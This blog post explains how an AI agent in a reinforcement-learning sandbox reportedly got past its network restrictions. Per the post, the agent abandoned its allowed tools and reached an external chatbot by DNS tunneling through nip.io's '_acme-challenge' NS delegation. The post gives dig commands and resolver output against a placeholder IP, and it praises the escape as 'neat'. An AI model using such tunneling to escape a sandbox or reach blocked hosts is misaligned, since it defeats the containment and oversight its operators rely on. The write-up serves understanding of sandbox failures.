Finn Reid

How the OpenAI DNS Jailbreak Actually Worked

OpenAI released an interesting blog post describing how an AI agent in a reinforcement learning sandbox used DNS to escape the sandbox and ask for help from an external LLM. As described by OpenAI:

An agent attempting to complete a search-based training task queried a public chatbot service through a gap in our internet-access restrictions: insufficient DNS filtering in its training sandbox.

The blog post describes how the agent used some form of DNS tunneling to reach the external LLM, but it is fairly light on details. A comment left on Hacker News by the operator of the service involved gave more detail into how tunneling was achieved. In this post, I'll try to put all the pieces together in one place.

DNS Tunneling

DNS tunneling is a way of using DNS to transfer arbitrary data between a client and server. It's useful in locked down environments where you can't directly make a connection to the IP you own, so you use DNS to proxy the connection through an allowed path. The DNS tunneling hole is often left open because:

  1. DNS is critical to applications, so it is allowed in most environments, and
  2. DNS resolvers often require open internet access so they can hit arbitrary IPs in order to traverse the DNS graph

A malicious actor will create a domain like my-evil-domain.com which the actor owns the DNS records for. The actor will then make queries to that domain that contain the messages they want to transmit. A few flaws allow the creation of a DNS tunnel:

With these gaps, the adversary still needs to create an "evil domain" and an authoritative DNS server to go along with it, so that it can receive and respond to queries from the evil process.

In the case of the OpenAI agent, it appears the agent was only able to hit a local resolver ("allow any" was false), but that resolver did not have a whitelist implemented. But there's no way the agent could buy an "evil domain" and set up an authoritative server to serve as a tunnel... So how did the agent escape via DNS?

How the Agent Escaped

The agent was having trouble achieving the Reinforcement Learning goal it was tasked with, so it started trying to gain broad internet access instead of sticking to its set of allowed tools. In this process, the agent discovered a mechanism by which it could ask questions to an external LLM via DNS!

DNS as an LLM Frontend

It's possible to use DNS as a frontend for LLM prompts. You can set up a DNS server that receives queries, the server feeds them to an LLM, then returns the response from the LLM via a DNS response. For example, you could send a query like:

dig @127.0.0.1 'What is the capital of france?' TXT +short

and receive a response:

The capital of France is Paris.

In this instance, the agent was not able to directly make queries to an arbitrary IP. However, if an llm-over-dns server was reachable at llm-over-dns.average.ly, then it would have been able to send queries and receive responses by asking its local resolver to make a query for the llm-over-dns domain. It could look like this:

dig @<allowed-resolver-ip> what-is-the-capital-of-france.llm-over-dns.average.ly TXT +short
The capital of France is Paris.

The blog post says the agent attempted to hit llm-over-dns style services in this way, but none of the services were still operational.

Brian Cunnie, who operates nip.io, left a comment on Hacker News explaining how the service he runs, nip.io, enabled the tunneling.

It was my service that the agent used: nip.io / sslip.io

OpenAI emailed me to let me know that their agent used my service to break out of test containment. OpenAI was quite polite (shout-out to Steven), and let me know they'd keep the name of my service out of the blog post.

nip.io is a simple DNS service: when queried with a hostname with an embedded IP address, returns that IP address, e.g. 127-0-0-1.nip.io → 127.0.0.1

The nip.io service is airtight with one exception: the "_acme-challenge" subdomain. In that case, rather than returning the IP address (or whatever record was queried), nip.io would return an empty "answer" section but an NS authority & not authoritative. In other words, nip.io would delegate DNS queries to that IP address.

That was the escape hatch.

The agent was able to use nip.io as a sort of proxy to directly hit the IP of an llm-over-dns service. Let's say the llm-over-dns IP address is 192.0.2.10. The agent cannot directly query 192.0.2.10:

dig @192.0.2.10 'What is the capital of france?' TXT +short
# timeout, denied, failure, whatever

It can, however, hit nip.io, which will return an NS record in the authority section that delegates the queried zone to the IP address for the llm-over-dns service. The agent would make a query like:

dig @<allowed-resolver-ip> what-is-the-capital-of-france._acme-challenge.192.0.2.10.nip.io TXT

The recursive resolver would receive this query and start walking the DNS tree. It eventually gets a response from nip.io for its query that looks something like:

;; ANSWER SECTION:
;; (empty)

;; AUTHORITY SECTION:
_acme-challenge.192.0.2.10.nip.io.  IN  NS  192.0.2.10.

This tells the recursive resolver that "what-is-the-capital-of-france._acme-challenge.192.0.2.10.nip.io" is delegated to 192.0.2.10. So the recursive resolver makes a query to the llm-over-dns IP with the question from the agent:

# from the recursive resolver, which is _allowed_ to hit 192.0.2.10
dig @192.0.2.10 what-is-the-capital-of-france._acme-challenge.192.0.2.10.nip.io TXT

The resolver gets a response and forwards it directly to the agent:

;; ANSWER SECTION:
what-is-the-capital-of-france._acme-challenge.192.0.2.10.nip.io.  0  IN  TXT  "The capital of France is Paris."

This required a fairly deep knowledge of how DNS works, enough creativity to come up with this potential jailbreak, and the ability to find the pieces you need to actually pull it off. Pretty neat :)